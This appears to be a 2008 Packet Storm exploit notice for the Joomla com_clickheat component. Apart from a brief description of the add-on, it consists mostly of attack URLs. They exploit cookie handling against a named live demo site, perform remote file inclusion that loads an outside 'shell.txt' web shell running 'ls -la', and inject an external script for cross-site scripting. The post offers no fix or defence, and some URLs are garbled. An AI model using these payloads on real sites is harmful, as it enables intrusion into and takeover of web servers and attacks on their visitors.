joomlaclickheat-rfi.txt

2008-07-10T00:00:00
ID PACKETSTORM:67958
Type packetstorm
Reporter e.wiZz!
Modified 2008-07-10T00:00:00

Description

                                        
                                            `**********************Joomla Component com_clickheat Multiple vulnerabilities***********************  
  
By: e.wiZz!  
Site: madspot.org  
Info: bosnian ftw!  
  
  
  
In the wild.....  
  
**************************************************************************************************************************************  
******Info: Clickheat is an add-on for Joomla, which primary goal is to "visualize" clicks made on the pages of your website. Upon collecting enough information, Clickheat displays a heatmap of most clicked areas, coloring them from blue (rare clicks) to yellow ("hottest area").   
  
*****Site: recly.com  
  
*****Demo: http://www.recly.com/demo/joomla2/index.php?from_mod=true&tmpl=component&option=com_clickheat  
  
  
  
  
*******************************COOKIE HANDLING VULNERABILITY************(from .jpg)**************************************  
  
http://<INTHEWILD>/<INSTALL-PATH>/index.php?option=com_ clickheat&task=http://sitewithevil.JPG  
  
http://www.recly.com/demo/joomla2/index.php?from_mod=true&tmpl=component&option=com_clickheat&task=open_heatmap&page=http://www.planetnana.co.il/mycoolpictures123/fake/lt2.jpg  
  
******************************************************RFI*********************************************************************************  
if magic_quotes_off  
  
http://<INTHEWILD>/<INSTALL-PATH>/index.php?option=com_ clickheat&task=http://shell.txt?cmd=ls -la  
  
  
************XSS**************  
  
http://<INTHEWILD>/<INSTALL-PATH>/index.php?option=com_ clickheat&task=http://somewhere.js`